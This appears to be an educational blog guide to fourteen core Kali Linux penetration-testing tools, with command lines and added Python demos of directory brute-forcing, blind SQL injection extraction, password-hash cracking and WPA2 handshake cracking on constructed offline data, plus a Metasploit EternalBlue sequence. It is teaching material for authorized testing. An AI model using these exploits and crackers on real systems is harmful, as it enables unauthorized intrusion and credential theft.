Introduction
Kali Linux ships with over 600 pre-installed security tools.
A new student spends weeks installing and briefly experimenting with all of them.
At their first penetration test interview, they cannot confidently demonstrate proficiency with any single one.
But here's the problem:
👉 Professional ethical hackers do not use all the Kali Linux tools available. They use a carefully selected core toolkit—and they know that small toolkit extraordinarily well.
Kali Linux's overwhelming toolkit is both its greatest strength and its most dangerous trap for beginners. The sheer volume of tools creates the illusion that learning more tools equals becoming a better hacker. In reality, it is the exact opposite. The penetration tester who can use Nmap like second nature, who can craft Burp Suite payloads intuitively, and who can navigate Metasploit quickly and confidently is far more effective than someone who has briefly touched 200 different tools.
Instead of trying to learn everything, the most successful ethical hackers identify the universally relied-upon core tools, invest serious time building genuine proficiency with each one, and then add specialized tools as specific engagement scenarios demand.
In this definitive breakdown, you'll learn:
- Why mastery of fewer Kali Linux tools beats surface exposure to many
- The top tools organized by their role in the penetration test lifecycle
- Exactly what each tool does and what problem it is designed to solve
- Recommended beginner exercises to build genuine practical proficiency
- Which tools appear on OSCP and other professional certification exams
- How to safely practice these tools in a legal laboratory environment
By the end of this article, you will have clarity on exactly which Kali Linux tools deserve your dedicated study time, and a plan for practicing each methodically.
The Core Principle: Depth Over Breadth
Before listing the tools, it is essential to reinforce the foundational principle that separates professional penetration testers from enthusiastic amateurs.
In a real client engagement, you are under time pressure. The client is paying significant hourly fees. You cannot afford to Google basic usage syntax for your own tools. You cannot run a tool blindly and hope the output makes sense. You need to know exactly what data you are expecting from each tool, and precisely how to interpret anomalies in that output to identify vulnerabilities.
This level of intuitive proficiency only comes from deeply repetitive, deliberate practice with a small number of core Kali Linux tools. Quality of practice always defeats quantity of tools collected.
Reconnaissance & Information Gathering Tools
1. Maltego
Primary purpose: Visual OSINT (Open Source Intelligence) mapping.
Maltego automates the collection of information from public data sources (DNS records, WHOIS databases, social media platforms, and web scraping) and displays the relationships between entities as a visual graph. A domain name connects to IP addresses, which connect to server administrators, whose emails connect to other associated domain registrations.
Why it's essential: During the reconnaissance phase, mapping these data relationships often reveals unexpected attack vectors—a forgotten subdomain, an exposed employee email on a public GitHub repository, or a test server that shouldn't be publicly accessible.
2. theHarvester
Primary purpose: Automated email, subdomain, and IP address gathering.
A command-line OSINT tool that queries search engines, LinkedIn, Shodan, and other public data sources to aggregate employee email addresses, subdomains, and IP ranges associated with the target organization. Several of its sources (Shodan among them) only work once you have configured an API key for them.
Practice exercise: Run theHarvester against a company that has an explicit, public bug bounty program (HackerOne lists such programs and their scope). theHarvester queries third-party services rather than the target itself, so the collection is passive, but the program's scope still decides what you may do with what it finds. Map the emails and subdomains it discovers.
Scanning & Enumeration Tools
3. Nmap
Primary purpose: Network host discovery and port scanning.
Nmap is the starting point of almost every penetration test. It identifies which hosts are listening on a network, which ports are open on each host, and which software services are running behind those ports. The -sV flag enables service version detection, which is critical for finding exploitable software versions.
Key Kali usage:
nmap -sV -sC -p- --open 192.168.1.10
This single command runs a comprehensive scan: detect service versions (-sV), run the default script set (-sC), scan all 65535 TCP ports (-p-), and display only open ports (--open). A full-port scan with version detection is slow, so run it per host rather than across a whole subnet, and add -oA <name> so the results are saved in Nmap's normal, grepable and XML formats for later parsing instead of scrolling off the terminal.
Why it appears everywhere: The OSCP exam, CEH exam, and virtually every professional penetration testing methodology lists Nmap as the first active scanning step. Mastering Nmap is non-negotiable.
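Saving the scan as XML is only useful if you then do something with it. The following is an added example (not code from the article or from the Nmap project) that parses the XML that -oX produces, lists the open ports with their service banners, and flags the ones Nmap could not fingerprint, which are the ones you probe by hand next. The XML document inside it is a constructed sample in the shape Nmap emits, not the output of a real scan, and the host address and versions in it are made up.

```python
"""Parse Nmap XML output (-oX) and pull out open ports with service/version.

Added example, not from the original article or the Nmap project. The XML below is a
constructed sample in the shape Nmap emits, not output from a real scan.
"""
import xml.etree.ElementTree as ET

# Constructed sample: what `nmap -sV -sC -p- --open -oX scan.xml 192.168.1.10`
# might produce, trimmed to the elements the parser needs.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -sC -p- --open -oX scan.xml 192.168.1.10">
  <host>
    <status state="up"/>
    <address addr="192.168.1.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="7.2p2 Ubuntu 4ubuntu2.8"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http" product="Apache httpd" version="2.4.18"/>
      </port>
      <port protocol="tcp" portid="445">
        <state state="open"/>
        <service name="microsoft-ds"/>
      </port>
      <port protocol="tcp" portid="8080">
        <state state="filtered"/>
        <service name="http-proxy"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def parse_open_ports(xml_text):
    """Return one dict per open port: host, port, proto, service, product, version."""
    root = ET.fromstring(xml_text)
    results = []
    for host in root.iter("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # --open filters these already, but a parser should not rely on it
            svc = port.find("service")
            results.append({
                "host": addr,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": svc.get("name", "") if svc is not None else "",
                "product": svc.get("product", "") if svc is not None else "",
                "version": svc.get("version", "") if svc is not None else "",
            })
    return results


def unfingerprinted(results):
    """Open ports Nmap could not attach a product name to: these need manual probing."""
    return [r for r in results if not r["product"]]


if __name__ == "__main__":
    ports = parse_open_ports(SAMPLE_NMAP_XML)
    for r in ports:
        line = f"{r['host']}:{r['port']}/{r['proto']}  {r['service']:<14} {r['product']} {r['version']}"
        print(line.rstrip())
    for r in unfingerprinted(ports):
        print(f"-> {r['port']}/{r['proto']} has no version string; probe it manually")
```

The filtered 8080 entry is in the sample on purpose: a parser that only reads the service element and ignores the state element would report it as a finding. On the sample, the script lists 22, 80 and 445 and singles out 445 as the port with no product string.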
4. Gobuster / Dirb / Feroxbuster
Primary purpose: Directory and file brute-forcing on web servers.
These tools rapidly brute-force a web server's URL paths using large wordlists to discover hidden directories and files not linked from the main website (e.g., /admin, /backup, /old-site, /config). Hidden directories often contain exposed configuration files, old upload forms, or unprotected administrative panels.
Common Kali command:
gobuster dir -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
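To see what these tools actually do per request, here is an added example (not gobuster's code, nor code from the article) that brute-forces paths the same way: one request per wordlist entry, with and without a trailing slash, a thread pool for speed, and the wildcard check gobuster performs first, because a server that answers 200 to every path would turn every guess into a false positive. It starts its own tiny HTTP server with a constructed set of paths, so it runs offline and never touches a real target; the paths, status codes and seven-word wordlist are all made up for the demo.

```python
"""Minimal directory brute-forcer in the style of gobuster/dirb, run offline.

Added example, not code from gobuster or the original article. It starts a tiny local
HTTP server with a constructed set of paths so the whole thing runs without a real target.
"""
import secrets
import threading
import urllib.error
import urllib.request
from concurrent.futures import ThreadPoolExecutor
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Constructed "site": path -> HTTP status the server answers with.
FAKE_SITE = {
    "/": 200,
    "/index.html": 200,
    "/admin/": 200,
    "/backup/": 403,   # forbidden, but its existence is still a finding
    "/robots.txt": 200,
}

# Constructed mini-wordlist; real runs use directory-list-2.3-medium.txt.
WORDLIST = ["admin", "backup", "old-site", "config", "uploads", "robots.txt", "index.html"]


class FakeHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        status = FAKE_SITE.get(self.path, 404)
        self.send_response(status)
        self.end_headers()
        self.wfile.write(b"ok" if status == 200 else b"")

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_server():
    """Bind to a free port on localhost and serve in a background thread."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), FakeHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}"


def status_of(url):
    """HTTP status for a GET; urllib raises on 4xx/5xx, so unwrap the code."""
    try:
        with urllib.request.urlopen(url, timeout=5) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code


def brute_force(base, words, threads=8):
    """Request base/<word> and base/<word>/ for every word; return every non-404 hit."""
    # Wildcard check, as gobuster does: if a random path is not a 404, every guess
    # would look like a hit and the results would be meaningless.
    if status_of(f"{base}/{secrets.token_hex(8)}") != 404:
        raise RuntimeError("server answers non-404 for random paths; filter by response size instead")
    candidates = [f"/{w}" for w in words] + [f"/{w}/" for w in words]
    with ThreadPoolExecutor(max_workers=threads) as pool:
        statuses = list(pool.map(lambda p: (p, status_of(base + p)), candidates))
    return sorted((p, s) for p, s in statuses if s != 404)


def run_demo():
    """Spin up the fake site, brute-force it, tear it down; returns [(path, status), ...]."""
    srv, base = start_server()
    try:
        return brute_force(base, WORDLIST)
    finally:
        srv.shutdown()


if __name__ == "__main__":
    for path, status in run_demo():
        print(f"{status} {path}")
```

Note that /backup/ is reported even though it answers 403: a forbidden directory tells you it exists, which is exactly the kind of lead (old backups, an admin panel behind an IP allow-list) the paragraph above describes. With gobuster the equivalent knobs are -t for threads and -s/-b for the status codes to keep or drop.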
Exploitation Tools
5. Metasploit Framework (msfconsole)
Primary purpose: Comprehensive exploitation platform.
Metasploit is Kali's most powerful exploitation tool. It contains thousands of pre-built exploit modules targeting known vulnerabilities in specific software versions. The post-exploitation agent (Meterpreter) provides a rich, interactive session on compromised machines, enabling file browsing, credential harvesting, and lateral movement.
Essential commands:
msfconsole # Launch Metasploit
search eternalblue # Search for a specific exploit
use exploit/windows/smb/ms17_010_eternalblue # Select an exploit module
show options # View required parameters
set RHOSTS 192.168.1.10 # Configure the target
set LHOST 192.168.1.5 # Your own address, where the default reverse-TCP payload connects back
run # Execute the exploit ("exploit" does the same)
OSCP relevance: The OSCP exam rules allow Metasploit exploit, auxiliary and post modules, and Meterpreter payloads, against only one target machine of your choice; multi/handler and msfvenom-generated plain shells may be used throughout. Understanding Metasploit deeply, including what each module does under the hood so you can reproduce it by hand, is a fundamental learning milestone before transitioning to fully manual exploitation.
6. SQLmap
Primary purpose: Automated SQL injection detection and exploitation.
SQLmap takes a URL with a parameter and automatically determines whether it is vulnerable to SQL injection. If vulnerable, it can automatically extract database tables, column names, and data. It supports union-based, time-based blind, boolean-based, and error-based SQL injection techniques.
Basic usage:
sqlmap -u "http://target.com/page.php?id=1" --dbs
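What sqlmap is testing for is easier to see in miniature. The following added example (not sqlmap's code, nor code from the article) puts the page.php?id=1 pattern next to its parameterised fix, and then shows the boolean-based blind technique the paragraph lists: when nothing from the database is reflected in the page, a single true/false difference in the response is enough to read a value one character at a time. It uses an in-memory SQLite database with two constructed rows; the table, usernames and passwords are made up for the demo.

```python
"""Vulnerable vs. parameterised query, plus the boolean-based blind inference sqlmap automates.

Added example, not sqlmap's code or code from the original article. Uses an in-memory
SQLite database with constructed rows.
"""
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'alice', 's3cret'), (2, 'bob', 'hunter2');
""")


def vulnerable_lookup(user_id):
    """The page.php?id=... pattern: the parameter is concatenated straight into SQL."""
    return conn.execute(f"SELECT username FROM users WHERE id = {user_id}").fetchall()


def safe_lookup(user_id):
    """Hardened form: the value travels as a bound parameter, never as SQL text."""
    return conn.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchall()


def page_shows_alice(user_id):
    """The only signal a blind attacker gets: does the page render the same content or not?"""
    return vulnerable_lookup(user_id) == [("alice",)]


def blind_extract(column, row_id, max_len=16):
    """Boolean-based blind extraction: one true/false question per character position.

    Each probe asks "is character N of <column> equal to X?" and reads the answer from the
    page's behaviour. sqlmap does the same, with bisection over the character range instead
    of this linear search, whenever no query result is reflected in the response.
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in "abcdefghijklmnopqrstuvwxyz0123456789":
            probe = f"1 AND substr((SELECT {column} FROM users WHERE id={row_id}),{pos},1)='{ch}'"
            if page_shows_alice(probe):
                recovered += ch
                break
        else:
            break  # no character matched: end of the string
    return recovered


if __name__ == "__main__":
    print("tautology, vulnerable:", vulnerable_lookup("1 OR 1=1"))   # every row
    print("tautology, parameterised:", safe_lookup("1 OR 1=1"))      # nothing: compared as text
    print("bob's password, blind:", blind_extract("password", 2))
```

Two things to take from it. First, the fix is not escaping: safe_lookup never builds SQL from the input, so the tautology is simply compared as a string and matches nothing. Second, the blind loop is slow by design (dozens of requests per character), which is why sqlmap's --technique and --threads options matter in practice and why its traffic is easy to spot in web server logs.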
Web Application Testing Tools
7. Burp Suite
Primary purpose: Web application intercepting proxy and analysis platform.
Burp Suite sits between your browser and the web server, capturing every single HTTP request. You can pause, inspect, modify, and resend requests manually. Its Intruder module automates fuzzing by substituting payload lists into specified positions within a request, enabling efficient testing of login forms, search fields, and API parameters.
Key Burp Suite modules for beginners:
- Proxy: The core intercepting proxy.
- Repeater: Manually modify and re-send HTTP requests.
- Intruder: Automate payload injection across parameters.
- Decoder: Encode/decode common formats (Base64, URL encoding, HTML entities).
8. WPScan
Primary purpose: WordPress vulnerability scanner.
WordPress runs more than 40% of all websites by most surveys. WPScan is a purpose-built black-box scanner that identifies vulnerable WordPress versions, insecure plugins, exposed user accounts, and weak passwords against a WordPress installation. Its vulnerability details come from the WPScan database, which requires a free API token (passed with --api-token); without one it still enumerates versions, plugins and users, but reports no known vulnerabilities for them.
wpscan --url http://target-wordpress.com --enumerate u,p
Password Cracking Tools
9. Hashcat
Primary purpose: GPU-accelerated offline password hash cracking.
Hashcat leverages your graphics card (GPU) to perform billions to tens of billions of hash calculations per second against fast hashes such as NTLM, cracking captured password hashes using dictionary attacks (trying every word in a massive wordlist), rule-based attacks (mangling each word with capitalisation, suffixes and substitutions), mask attacks (structured brute force such as ?u?l?l?l?d?d) or plain brute force (every possible character combination).
Typical usage against an NTLM hash:
hashcat -m 1000 captured_hash.txt /usr/share/wordlists/rockyou.txt
The rockyou.txt wordlist, containing over 14 million real-world passwords leaked from a massive historical breach, comes bundled with Kali Linux as /usr/share/wordlists/rockyou.txt.gz; decompress it once with gunzip before the first run.
10. John the Ripper
Primary purpose: Offline password cracker with automatic hash detection.
John the Ripper automatically identifies common hash types from a file's formatting and begins cracking them with its extensive default rule set without requiring the user to specify the hash type manually. When several formats fit the same string (raw MD5 and NTLM are both 32 hex characters, for example) it picks one and warns about the others, so pass --format= explicitly in that case. Cracked passwords are stored in ~/.john/john.pot and printed with john --show hashes.txt.
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
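The mechanics behind both crackers are the same, and seeing them in a few dozen lines makes the hashcat and John command lines above less magical. The following added example (not code from hashcat, John the Ripper or the article) runs a dictionary attack with a small subset of their mangling rules against a set of constructed hashes. It uses SHA-256 (hashcat mode 1400) rather than NTLM because SHA-256 is available in every Python build; the loop is identical for NTLM, only the hash function changes. The five-word wordlist and the three "captured" hashes are made up for the demo.

```python
"""Dictionary attack with a few John/hashcat-style mangling rules, on constructed hashes.

Added example, not code from hashcat or John the Ripper. Uses SHA-256 (hashcat -m 1400)
because it is available everywhere; for NTLM or any other unsalted fast hash only the
hash function changes.
"""
import hashlib

# Constructed mini-wordlist standing in for rockyou.txt.
WORDLIST = ["password", "letmein", "summer", "welcome", "dragon"]


def rules(word):
    """A tiny subset of the mangling both crackers apply: as-is, Capitalised, digit suffix, leet."""
    yield word
    yield word.capitalize()
    for n in range(100):
        yield f"{word}{n}"
        yield f"{word.capitalize()}{n}"
    yield word.replace("a", "@").replace("e", "3").replace("o", "0")
    yield word.capitalize() + "!"


def sha256_hex(s):
    return hashlib.sha256(s.encode()).hexdigest()


def crack(hashes, wordlist, hashfn=sha256_hex):
    """Return {hash: plaintext} for every hash some wordlist+rules candidate reproduces.

    Unsalted hashes are attacked all at once: each candidate is hashed once and looked up
    against the whole target set, which is why one rockyou pass covers thousands of NTLM
    hashes for the price of one. A per-user salt breaks exactly this sharing.
    """
    targets = set(hashes)
    found = {}
    for word in wordlist:
        for candidate in rules(word):
            h = hashfn(candidate)
            if h in targets and h not in found:
                found[h] = candidate
                if len(found) == len(targets):
                    return found  # stop early once everything is cracked
    return found


# Constructed "captured" hashes: two crackable ones and one strong passphrase.
CAPTURED = [
    sha256_hex("Summer19"),
    sha256_hex("dr@g0n"),
    sha256_hex("correct horse battery staple"),
]

if __name__ == "__main__":
    for h, plain in crack(CAPTURED, WORDLIST).items():
        print(f"{h[:16]}...:{plain}")
```

The early-return and the set lookup are the two details worth copying into your mental model: cracking speed is dominated by hash computations, not comparisons, so a GPU that computes the hash faster helps, and a salted or deliberately slow hash (bcrypt, scrypt, Argon2) hurts, because each candidate must then be hashed once per target.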
Post-Exploitation & Privilege Escalation Tools
11. LinPEAS / WinPEAS
Primary purpose: Automated local privilege escalation enumeration.
After gaining an initial low-privilege shell on a target machine, the next objective is escalating to root (Linux) or SYSTEM (Windows) level privileges. LinPEAS (Linux Privilege Escalation Awesome Script) and WinPEAS (its Windows equivalent) automatically enumerate hundreds of potential privilege escalation vectors extremely quickly and color-code the most critical findings.
Running LinPEAS immediately after getting an initial shell on a Linux machine is a near-universal penetration testing practice. Read the whole output rather than only the red/yellow highlights: the script points at candidates (SUID binaries, writable service files, sudo rules, leftover credentials), and confirming which one is actually exploitable is still your job.
12. Mimikatz (Windows)
Primary purpose: Windows credential extraction.
Mimikatz is the most infamous post-exploitation tool in existence. Running with local administrator rights (it elevates itself to SYSTEM and enables SeDebugPrivilege), Mimikatz reads the memory of the LSASS process and extracts NTLM password hashes and Kerberos tickets; plaintext passwords appear only where WDigest credential caching is still enabled, which current Windows versions disable by default. These captured credentials are then used for Pass-the-Hash attacks or lateral movement across the Active Directory domain. Expect LSA Protection or Credential Guard to block the read on hardened hosts, and expect every EDR product to flag the stock binary on sight.
Network Analysis Tools
13. Wireshark
Primary purpose: Network packet capture and analysis.
Wireshark captures and analyzes all packets traversing a network interface, decoding them into their constituent protocols and displaying them in a structured, filterable format. It is invaluable for understanding what data is unencrypted on a network, analyzing the network behaviour of malware, and understanding how specific protocols operate at the packet level.
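"Decoding into constituent protocols" is a stack of fixed-layout headers, each one telling you how to read the next. The following added example (not Wireshark code, nor code from the article) walks one Ethernet/IPv4/TCP frame the way a dissector does, verifying the IPv4 header checksum on the way, and pulls out the fields an analyst reads first: endpoints, TTL, TCP flags and the plaintext payload. The frame is constructed inline (a plaintext HTTP GET between two made-up hosts), so the decoder runs without a capture file or a network interface; the MAC and IP addresses are fictitious.

```python
"""Decode a raw Ethernet/IPv4/TCP frame layer by layer, as Wireshark's dissectors do.

Added example, not Wireshark code or code from the original article. The frame is
constructed inline so the decoder runs without a capture file or a network interface.
"""
import struct


def ipv4_checksum(header):
    """RFC 1071 one's-complement sum over the IPv4 header (checksum field zeroed)."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack(f"!{len(header) // 2}H", header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_frame(payload):
    """Constructed sample: 00:11:22:33:44:55 -> 66:77:88:99:00:11, 10.0.0.5:51234 -> 10.0.0.80:80, PSH/ACK."""
    eth = bytes.fromhex("667788990011") + bytes.fromhex("001122334455") + b"\x08\x00"  # dst, src, IPv4
    tcp = struct.pack("!HHIIBBHHH", 51234, 80, 1000, 2000, 5 << 4, 0x18, 64240, 0, 0) + payload
    total_len = 20 + len(tcp)
    ip_no_csum = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0x1234, 0x4000, 64, 6, 0,
                             bytes([10, 0, 0, 5]), bytes([10, 0, 0, 80]))
    csum = ipv4_checksum(ip_no_csum)
    ip = ip_no_csum[:10] + struct.pack("!H", csum) + ip_no_csum[12:]
    return eth + ip + tcp


def decode_frame(frame):
    """Walk Ethernet -> IPv4 -> TCP -> payload and return the fields an analyst looks at first."""
    dst_mac, src_mac = frame[:6], frame[6:12]
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype != 0x0800:
        raise ValueError(f"not IPv4: ethertype 0x{ethertype:04x}")
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4  # header length in bytes; options make it > 20
    (_, _, total_len, _, _, ttl, proto, csum, src_ip, dst_ip) = struct.unpack("!BBHHHBBH4s4s", ip[:20])
    if ipv4_checksum(ip[:10] + b"\x00\x00" + ip[12:ihl]) != csum:
        raise ValueError("bad IPv4 header checksum")
    if proto != 6:
        raise ValueError(f"not TCP: protocol {proto}")
    tcp = ip[ihl:total_len]  # total_len trims Ethernet padding on short frames
    sport, dport, _, _, off_res, flags, _, _, _ = struct.unpack("!HHIIBBHHH", tcp[:20])
    data_off = (off_res >> 4) * 4  # TCP options, if any, live between byte 20 and here
    bits = ((0x02, "SYN"), (0x10, "ACK"), (0x08, "PSH"), (0x01, "FIN"), (0x04, "RST"))
    return {
        "src_mac": src_mac.hex(":"),
        "dst_mac": dst_mac.hex(":"),
        "src": f"{'.'.join(map(str, src_ip))}:{sport}",
        "dst": f"{'.'.join(map(str, dst_ip))}:{dport}",
        "ttl": ttl,
        "flags": [name for bit, name in bits if flags & bit],
        "payload": tcp[data_off:],
    }


if __name__ == "__main__":
    frame = build_frame(b"GET / HTTP/1.1\r\nHost: lab.local\r\n\r\n")
    for k, v in decode_frame(frame).items():
        print(f"{k:8} {v}")
```

The payload is readable because the constructed session is plain HTTP, which is the "what is unencrypted on this network" point above; the same walk over an HTTPS frame stops at the TLS record header. In Wireshark, the equivalent of the filter this code hard-codes is tcp.port == 80 && tcp.flags.push == 1.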
14. Aircrack-ng Suite
Primary purpose: Wireless network security auditing.
The Aircrack-ng suite provides tools for capturing Wi-Fi handshakes (airodump-ng), forcing deauthentication of clients (aireplay-ng), and cracking captured WPA2 handshakes against password wordlists (aircrack-ng). Wireless security testing is a dedicated penetration testing specialization and Aircrack-ng is its foundational toolkit.
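The "cracking against a wordlist" step is worth understanding at the level of the maths, because it explains both why WPA2 cracking is slow (4096 PBKDF2 rounds per guess) and why the handshake alone, without the passphrase, gives you nothing. The following added example (not aircrack-ng code, nor code from the article) performs exactly the derivation aircrack-ng runs for each candidate: passphrase and SSID to PMK, PMK plus both MAC addresses and both nonces to the PTK, and the PTK's first 16 bytes (the KCK) to the EAPOL message MIC, which is compared with the MIC in the capture. Instead of a real .cap file, the handshake is constructed here from a known passphrase, so the SSID, MAC addresses, nonces and EAPOL frame are all made-up values, and the four-word wordlist is likewise constructed.

```python
"""What aircrack-ng does with a captured WPA2 4-way handshake, in plain Python.

Added example, not aircrack-ng code or code from the original article. The handshake
(SSID, MACs, nonces, EAPOL frame, MIC) is constructed from a known passphrase so the same
derivation can then be run against a wordlist to recover it. Every value is made up.
"""
import hashlib
import hmac


def pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes). This is the slow step."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk(pmk_bytes, ap_mac, sta_mac, anonce, snonce):
    """PRF-512 from IEEE 802.11i over the ordered MACs and nonces; bytes 0..15 are the KCK."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):
        out += hmac.new(pmk_bytes, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck, eapol_frame_mic_zeroed):
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, EAPOL frame with MIC zeroed)[:16]."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol_zeroed, captured_mic, wordlist):
    """For each candidate derive PMK -> PTK -> MIC and compare with the MIC from the capture."""
    for candidate in wordlist:
        kck = ptk(pmk(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_zeroed), captured_mic):
            return candidate
    return None


# --- Constructed handshake, standing in for what airodump-ng writes to a .cap file ---
SSID = "HomeLab-Wifi"
AP_MAC = bytes.fromhex("02aabbccdd01")
STA_MAC = bytes.fromhex("02aabbccdd02")
ANONCE = hashlib.sha256(b"anonce-sample").digest()  # 32 random-looking bytes, made up
SNONCE = hashlib.sha256(b"snonce-sample").digest()
# Message 2 of the handshake with its 16-byte MIC field zeroed, the form aircrack hashes:
# 802.1X header, descriptor type, key info, key length, replay counter, SNonce, IV, RSC, ID, MIC, key data length.
EAPOL_ZEROED = (bytes.fromhex("0103005f") + b"\x02" + bytes.fromhex("010a") + bytes.fromhex("0010")
                + b"\x00" * 7 + b"\x01" + SNONCE + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8
                + b"\x00" * 16 + b"\x00\x00")
TRUE_PASSPHRASE = "letmein123"  # what the lab access point was configured with
CAPTURED_MIC = eapol_mic(ptk(pmk(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16], EAPOL_ZEROED)

WORDLIST = ["password", "12345678", "letmein123", "qwertyuiop"]

if __name__ == "__main__":
    print(crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_ZEROED, CAPTURED_MIC, WORDLIST))
```

Two practical consequences fall out of the code. The SSID is the PBKDF2 salt, so a precomputed table only ever helps for one network name, and the PMK step dominates run time, which is why aircrack-ng is slow on a CPU and why people export the handshake to hashcat (mode 22000) for the GPU. Note also that the capture must contain a complete, consistent handshake: with a wrong nonce or a MIC from a different message, no passphrase will ever verify.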
Short Summary
Mastering Kali Linux tools is not about installing and touching everything; it is about building genuine operational proficiency with the tools that matter most. The non-negotiable core toolkit includes: Nmap and Gobuster for reconnaissance and web enumeration; Metasploit and SQLmap for exploitation; Burp Suite for web application testing; Hashcat and John the Ripper for password cracking; LinPEAS for privilege escalation enumeration and Mimikatz for credential extraction after exploitation; and Wireshark for network traffic analysis. Every one of these tools comes pre-installed on Kali Linux and can be legally and safely practiced on platforms like TryHackMe on dedicated training machines.
Conclusion
The breadth of Kali Linux's toolkit is a testament to the vast scope of the penetration testing field. There is a specialized tool for almost every conceivable security testing scenario.
However, professional mastery comes from depth, not from breadth. Pick five tools from this list. Read their official documentation, and spend a dedicated week practicing each one exclusively against legal target machines on TryHackMe or your personal home lab. Write up your findings. Understand not just what the tool output shows, but why it showed that result.
When you can use your core Kali Linux tools without thinking—when the commands flow naturally from your fingers and the output speaks to you intuitively—you will have achieved the functional proficiency that separates amateurs from professionals.